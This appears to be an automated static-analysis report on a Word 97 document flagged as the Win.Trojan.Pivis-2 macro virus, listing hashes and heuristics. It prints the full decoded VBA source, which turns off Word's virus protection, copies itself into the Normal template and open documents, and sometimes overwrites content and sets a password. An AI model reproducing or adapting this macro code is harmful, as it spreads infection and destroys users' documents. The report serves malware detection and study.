Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 d69452451573eab5…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 2000-08-14 09:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: bafff52d89de041f678943224c14f642
SHA-1: 36b002bed06fb85aea3def56ac2ed66b204fe9bc
SHA-256: d69452451573eab5fff8673720ec8b45ad4ef66bbc9a747cd3e87d1793f5cd31
Risk Score: 120

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, a common technique for executing code as soon as a document is opened. The ClamAV detection name 'Win.Trojan.Pivis-2' strongly suggests a trojan payload. The macro code copies its own source between the Normal template and the active document's VBA project, indicating a self-propagation or infection mechanism.

Heuristics (3)

  • ClamAV: Win.Trojan.Pivis-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5954 bytes
SHA-256: a7028948b9b6a5771b009881166a8a0cad8cb66f2810434d2b190a1677f40260

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Randomize Timer
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
viruscode = Activecl.lines(1, Activecl.countoflines)
Normalcl.insertlines 1, viruscode
InfecteerDeHap:
If Activecl.countoflines > 0 Then GoTo Doeii
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
x = Int(Rnd * 100)
If x = 11 Then MsgBox "w97.LAM€ by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
.ReplaceLine 39, "Sub ToolsMacro()"
.ReplaceLine 40, "'(c) LiFEwiRE 2000"
.ReplaceLine 42, "Sub ViewVBCode()"
.ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
End With
'(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r
't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

Private Sub Document_new()
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.Saved = True
End Sub

' Processing file: /opt/analyzer/scan_staging/261bab45269a43358b58e88ab8ee3fdf.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3489 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld Timer 
' 	ArgsCall Read 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Normalcl 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set Activecl 
' Line #8:
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo InfecteerDeHap 
' 	EndIf 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld Activecl 
' 	MemLd countoflines 
' 	Ld Activecl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Normalcl 
' 	ArgsMemCall insertlines 0x0002 
' Line #11:
' 	Label InfecteerDeHap 
' Line #12:
' 	Ld Activecl 
' 	MemLd countoflines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	GoTo Doeii 
' 	EndIf 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld Normalcl 
' 	MemLd countoflines 
' 	Ld Normalcl 
' 	ArgsMemLd lines 0x0002 
' 	St viruscode 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld viruscode 
' 	Ld Activecl 
' 	ArgsMemCall insertlines 0x0002 
' Line #15:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdDocument 
' 	ParamNamed Fileformat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #16:
' 	Label Doeii 
' Line #17:
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	St x 
' Line #18:
' 	Ld x 
' 	LitDI2 0x000B 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0027 "w97.LAM€ by LiFEwiRE [www.shadowvx.org]"
' 	ParamOmitted 
' 	LitStr 0x0012 "...::LiFEwiRE::..."
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #19:
' 	Ld x 
' 	LitDI2 0x0019 
' 	
... (truncated)